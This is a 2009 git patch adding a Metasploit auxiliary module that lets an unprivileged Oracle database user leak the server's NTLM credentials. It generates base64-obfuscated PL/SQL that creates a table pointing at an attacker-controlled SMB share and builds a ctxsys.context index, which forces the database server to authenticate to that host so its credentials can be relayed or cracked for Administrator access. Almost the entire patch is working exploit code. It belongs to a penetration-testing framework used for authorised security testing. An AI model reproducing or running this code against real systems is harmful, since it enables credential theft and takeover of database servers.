From c8d0197a8661e955cfb3ea49bf208a197f405f95 Mon Sep 17 00:00:00 2001 From: Mario Ceballos Date: Tue, 7 Apr 2009 21:53:08 +0000 Subject: [PATCH] added auxiliary module ora_ntlm_stealer.rb from Sh2kerr git-svn-id: file:///home/svn/framework3/trunk@6464 4d416f70-5f16-0410-b530-b9f4589650da --- .../admin/oracle/ora_ntlm_stealer.rb | 80 +++++++++++++++++++ 1 file changed, 80 insertions(+) create mode 100644 modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb diff --git a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb new file mode 100644 index 0000000000..8bc02cdcd2 --- /dev/null +++ b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb @@ -0,0 +1,80 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Owning Windows server using Oracle database unpivileged user', + 'Description' => %q{ + This module will help you to get Administrator access to OS using unprivileged Oracle database user (you need only CONNECT and RESOURCE privileges) + To do this you must firstly run smb_sniffer of smb_relay module on your sever. Then you must connect to + Oracle database and run this module Ora_NTLM_stealer.rb which will connect to your SMB sever with credentials of Oracle RDBMS. + So if smb_relay is working you will get Administrators access to server which runs Oracle of not than you can decrypt HALFLM hash. + }, + 'Author' => [ 'Sh2kerr ' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + + [ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ], + + ], + 'DisclosureDate' => 'April 7 2009')) + + register_options( + [ + OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0']), + OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']), + OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']), + + ], self.class) + end + + def run + name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + + prepare = "CREATE TABLE #{name1} (id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,col_format VARCHAR(6))" + prepare1 = "INSERT INTO #{name1} VALUES (1, '\\\\#{datastore['IP']}\\SHARE', NULL)" + + exploiting1 = "CREATE INDEX #{name2} ON #{name1}(path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column col_format')" + + prp = Rex::Text.encode_base64(prepare) + prp1 = Rex::Text.encode_base64(prepare1) + exp1 = Rex::Text.encode_base64(exploiting1) + + sql = %Q| + DECLARE + #{rand1} VARCHAR2(32767); + #{rand2} VARCHAR2(32767); + #{rand3} VARCHAR2(32767); + BEGIN + #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}'))); + EXECUTE IMMEDIATE #{rand1}; + #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp1}'))); + EXECUTE IMMEDIATE #{rand2}; + #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}'))); + EXECUTE IMMEDIATE #{rand3}; + END; + / + | + + print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create(sql) + + end + +end